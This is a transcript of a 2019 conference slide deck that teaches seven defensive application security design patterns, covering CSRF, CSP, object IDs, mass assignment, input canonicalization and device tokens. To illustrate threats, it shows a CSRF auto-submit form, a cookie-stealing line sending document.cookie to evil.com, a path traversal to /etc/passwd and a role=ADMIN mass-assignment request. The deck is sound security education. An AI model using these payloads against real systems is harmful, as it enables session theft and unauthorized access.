7 Application Security Design Patterns You Should Know

Classification: Public 1

View Slide

7 Application Security Design Patterns
You Should Know
Security Meetup by SBA Research 0x05
Thomas Konrad, SBA Research
Vienna, August 1st, 2019
SBA Research gGmbH, 2019

View Slide

$ whoami
Thomas Konrad
$ id
uid=123(tom)
gid=0(SBA Research)
gid=1(Software Security)
gid=2(Penetration Testing)
gid=3(Software Development)
gid=4(Security Training)

View Slide

Bullet-proof Centralized
Request Processing
Pattern #1

View Slide

Wordpress: Script Files Spread All Over
Image source:
https://askubuntu.com/questions/179277/lamp-apache-not-
accepting-index-php-files-and-displaying-directory-listing

View Slide

Let’s Include Security
some_page.php
• That’s prone to errors!
• The same goes for .jsp, .aspx, ... all web scripting
languages with direct script access.
include('session.php');
include('access_control.php');
include('api_request_limit.php');
// Meh

View Slide

Pattern #1: Single
Application Entry
Point Pattern
SBA Research gGmbH, 2019 Photo by Fabian Grohs on Unsplash
B A S I C
B A S I C

View Slide

Mitigate The Problem By Design
• Single Application Entry Point Pattern
o Have a single entry point
o Put all your source files out of the web root
o Rewrite URLs to a single script
o Some environments and frameworks do that
automatically

View Slide

Benefits of a Single Application Entry Point
• Centralized session management
• Centralized access control
• Centralized API request limits
• Centralized ... anything

View Slide

Mitigating Cross-site Request Forgery
(CSRF) By Design
Pattern #2

View Slide

What is CSRF?
• Before we dive in, we need to clarify two
terms in detail
o Same-Origin Policy (SOP)
o Implicit vs. explicit authentication
2019 - SBA Research gGmbH

View Slide

What Is The Same-Origin Policy?
The Same-Origin Policy is a security policy in web
browsers that defines how a document or script of
one Origin can interact with those of other Origins.

View Slide

Erm... Origin?
URL
http://store.company.com/dir2/other.html
http://store.company.com/dir/inner/another.html
https://store.company.com/secure.html
http://store.company.com:81/dir/etc.html
http://news.company.com/dir/other.html
Example: http://store.company.com/dir/page.html
Result Reason
OK
OK
NOK Different protocol
NOK Different port
NOK Different host
Protocol, domain, and port must be equal!

View Slide

SOP: What Is Allowed And What Is Not?
• Cross-Origin writes are typically allowed
o Links, redirects, form submissions
• Cross-Origin embedding is typically allowed
o Scripts, CSS, images
• Cross-Origin reads are typically prohibited
o But information is sometimes leaked: Image size,
function in a script, availability of an embedded
resource [1]
[1] https://www.grepular.com/Abusing_HTTP_Status_Codes_to_Expose_Private_Information

View Slide

Implicit vs. explicit authentication
• Implicit authentication: Is automatically done by the
browser at each request – even cross-origin!
o Cookies
o HTTP basic auth
o TLS client certificates
• Explicit authentication: Is done manually by the developer
o Session token via header
o Session token via body parameter
o ... everything that’s not implicit

View Slide

CSRF: An Example
https://bank.com view-source://attacker.com

method=POST id=maliciousform>
name=recipient value=attacker/>
name=amount value=1000000/>

<br/>document.maliciousform.submit();<br/>
Hello, Alice!
Your transaction list
Date Recipient Amount
... ... ...
... ... ...
SESSIONID=el4ukv0kqbvoirg7nkp4dncpk3
bank.com Cookie Jar

View Slide

A CSRF attack only works if the server accepts ...
• write operations via GET, POST (or HEAD)
• with standard HTML form content types
o application/x-www-form-urlencoded
o multipart/form-data
o text/plain
• and implicit authentication (e.g., cookies)
• when no non-standard header is required.
Anything
that can
be done
with an
HTML
form

View Slide

Pattern #2: Custom
Request Header
Pattern
B A S I C
B A S I C S P A - O N L Y
S P A - O N L Y

View Slide

Custom Request Header: Frontend Example

View Slide

Custom Request Header: Backend Example

View Slide

Making the Integration of a CSP
a Breeze
Pattern #3

View Slide

Content Security Policy
“It's not a matter of if you will introduce an
XSS vulnerability, but when.”
Ben Vinegar, Disqus

View Slide

CSP: A Word Of Warning
1. CSP is not a solution for XSS!
2. CSP is only a defense in depth!
3. Correct Output encoding is the only solution.

View Slide

What is CSP?
• New HTTP response header
• Created for reducing XSS risk
• Whitelist for dynamic resources
Content-Security-Policy: script-src 'self' cdn.example.com

Refused to load the script 'http://evil.com/pwnage.js' because it violates the
following Content Security Policy directive: "script-src 'self'
cdn.example.com".

View Slide

CSP: Inline scripts are disabled by default
Content-Security-Policy: script-src 'self' cdn.example.com
Refused to execute inline script because it violates the following
Content Security Policy directive: "script-src 'self' cdn.example.com"
new Image('http://evil.com/?cookie=' +<br/>document.cookie);
• Also disallowed
o Event handlers in attributes
o Unsafe functions: eval(), setTimeout() and
setInterval() with inline code, etc.

View Slide

Pattern #3:
External Dynamic
Resources Pattern
A D V A N C E D
A D V A N C E D

View Slide

Externalize All The Things!
var x = 1; /* ... */
Link

Content
setTimeout('someFunction()', 1000);
setInterval('someFunction()', 1000);
eval('someFunction()');

View Slide

Externalize All The Things!

View Slide

Now, a Strict CSP is Easily Possible
Content-Security-Policy:
default-src 'self';
base-uri 'none';
report-uri 'https://csp.example.org';

View Slide

Effective Defense in Depth against
Missing Object-level Access Control
Pattern #4

View Slide

Insecure Direct Object References
https://example.com/profile/orders/3851
@Controller
public class OrderController {
@GetMapping("/api/v1/orders")
public ModelAndView getOrderById(@RequestParam String id) {
// ...
this.throwUnlessUserLoggedIn(); // Check if there is a session
Order order = orderRepository.find(id);
return this.createView(order);
}
}
GET /api/v1/shop/orders/<1-1000> HTTP/1.1
Host: example.com

View Slide

Pattern #4:
Random Object ID
Pattern
A D V A N C E D
A D V A N C E D

View Slide

Make All Object IDs Random!
• Randomly generate object IDs!
• Many frameworks database systems support this

View Slide

A Word On UUIDs
• UUID version 1: Uses the current timestamp and the MAC
address of the computer on which it was generated.
• UUID version 2: Like version 1, except that the least
significant 8 bits of the clock sequence are replaced by a
"local domain" number.
• UUID version 3 and 5: Version-3 and version-5 UUIDs are
generated by hashing a namespace identifier and name.
• UUID version 4: A version 4 UUID is randomly generated.
It has an entropy of 122 bits.

View Slide

Mitigating Arbitrary Entity Field
Overwrites and Excessive Data Exposure
by Design
Pattern #5

View Slide

Problem 1/2: Arbitrary Overwrite
PUT /api/v1/profile HTTP/1.1
Host: example.com
name=Alice&address=1,+Example+Street&role=ADMIN

View Slide

Problem 2/2: Excessive Exposure
GET /api/v1/search-user?query=Alice HTTP/1.1
Host: example.com
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 3290
[
{ name: 'Alice', password_hash: '0FAC322A...' },
{ ... }
]

View Slide

Pattern #5: Entity
Field Whitelist
Pattern
A D V A N C E D
A D V A N C E D

View Slide

How Can We Solve That?
• The idea: Use whitelists for input and output!
• Input
o Request Data Transfer Objects (Request DTOs)
• Output
o Response Data Transfer Objects (Response DTOs)
o Serialization Whitelist and Groups

View Slide

Data Transfer Objects (DTOs)
Image source:
http://www.servicedesignpatterns.com/RequestAndResponse
Management/DataTransferObject

View Slide

Serialization Whitelist

View Slide

Canonicalize, Validate, (Sanitize),
Store, Encode
Pattern #6

View Slide

Problem: Validation Before C18N
• Say you want a file path to always start with
• Your file system canonicalizes ../
• You validate the input
• An attacker could do
/var/www/public/uploads/
if (!path.startsWith('/var/www/public/uploads/') {/* Reject! */}
/var/www/public/uploads/../../../../etc/passwd

View Slide

Problem: Encoding Before Storing
• Say you want to do encoding before storing
• Problem
o What if you have a different output format?
o You must HTML-decode and do context-specific
encoding again
o That’s hardly maintainable!
String encodedName = HTMLEncoder.encode(name);
user.setName(encodedName);
entityManager.persist(user);

View Slide

Problem: Code Input
• When the input is code,
validation is hard
• Some parts of it are
acceptable
• We need to sanitize!
o Don’t roll your own
sanitizer!
o Use a library!
Image source: https://www.sketchappsources.com/free-
source/2963-WYSIWYG-Editor-template-sketch-freebie-
resource.html

View Slide

Pattern #6: Canonicalize,
Validate, (Sanitize),
Store, Encode Pattern
A D V A N C E D
A D V A N C E D

View Slide

Canonicalize, Validate, (Sanitize), Store, Encode
User
Interface
User
Interface
Application
Code
Application
Code Storage
Storage
Store
Store
Context-sensitive Output Encoding
Context-sensitive Output Encoding
Canonicalize
Canonicalize Validate
Validate (Sanitize)
(Sanitize)
HTML, JSON,
XML, CSV,
Text, ...
HTML, JSON,
XML, CSV,
Text, ...

View Slide

Establishing User Trust Levels and
Account Security Transparency
Pattern #7

View Slide

A Basic User Account Threat Model
Threat Severity1 C/I/A Countermeasures
Password guessing High C/I/- (Temporary) user lockout, password
policy, MFA, transparency (device lists
and notifications, with Device Tokens)
Account lockout Medium -/-/A Selective lockout (with Device Tokens)
Misuse of known
passwords (public
lists, other apps, ...)
Medium C/I/- MFA
Someone dumps the
DB on the Internet
Medium C/I/- Proper hashes (Argon2)
Enumerating valid
user names
Low C/-/- (Generic error messages, constant timing
on all requests containing the user name)
1 The severity really depends on the classification of your data. Don’t see them as absolute and unchangeable values.

View Slide

Password Guessing vs. Account Lockout
• This is the hard part!
• Do you know Hammer Head?
https://giphy.com/gifs/cuteness-Hnv3oVMOkmHiE

View Slide

Preventing User Lockout: A Question Of Trust
Image source: https://www.supermarketguru.com/site/assets/files/6521/bakerycounter.jpg

View Slide

Transparency: Notifications

View Slide

Transparency: Device List

View Slide

Pattern #7: Device
Token Pattern
S O P H I S T I C AT E D
S O P H I S T I C AT E D

View Slide

Device Tokens
• Device Tokens in a nutshell
o Catch successful login events
o If this is a new device
– Issue a Device Token
– Send a notification (as you saw before)
o The token must be long-running!
o Connect the new session to it
o Store source IP, user agent, first access, last access

View Slide


View Slide

Preventing User Lockout: The Pareto Principle
• You can save most users from being locked out
• But not 100 %!
• A note for apps with public registration forms
o An attacker could register and issue themselves
new device cookies via a script
o Therefore: Count failed login attempts also for
users and hard-lock them in case they’re attacking

View Slide

Device Tokens
• Device Tokens enable us to do tons of great
things
o List devices (transparency!)
o Notifications upon a login from a new device
(transparency!)
o Remember MFA for specific devices
o Remember previously logged-in users
o Slow down password guessing
o ...
• They are a must-have for good account
security!

View Slide

Summary
• Pattern #1: Single Application Entry Point Pattern
• Pattern #2: Custom Request Header Pattern
• Pattern #3: External Dynamic Resources Pattern
• Pattern #4: Random Object ID Pattern
• Pattern #5: Entity Field Whitelist Pattern
• Pattern #6: Canonicalize, Validate, (Sanitize), Store,
Encode Pattern
• Pattern #7: Device Token Pattern

View Slide

OWASP API Security Top 10 (Draft)
• A1:2019 Missing Object Level Access Control
• A2:2019 Broken Authentication
• A3:2019 Excessive Data Exposure
• A4:2019 Lack of Resources & Rate Limiting
• A5:2019 Missing Function/Resource Level Access Control
• A6:2019 Mass Assignment
• A7:2019 Security Misconfiguration
• A8:2019 Injection
• A9:2019 Improper Assets Management
• A10:2019 Insufficient Logging & Monitoring

View Slide

Questions?
Image source: https://giphy.com/gifs/reactionseditor-reaction-l0Iy8hSJalxmgTOF2

View Slide

sec4dev
Conference & Bootcamp
• Security Conference & Bootcamp for
developers
• Feb 24 to 27, 2020
• TU Wien
• https://sec4dev.io
• @sec4dev

View Slide

Next Meetup!
• Secure Credential Management
with Vault in Kubernetes
• September 4th, 2019
• SBA Research (Floragasse 7, Vienna)
• Speaker: Alexander Bulyha
• Please RSVP!

View Slide

Thomas Konrad
SBA Research gGmbH
Floragasse 7, 1040 Vienna
[email protected]
@_thomaskonrad
Photo by Kelly Sikkema on Unsplash

View Slide

7 Application Security Design Patterns You Should Know

7 Application Security Design Patterns You Should Know

Thomas Konrad

More Decks by Thomas Konrad

Other Decks in Technology

Featured

Transcript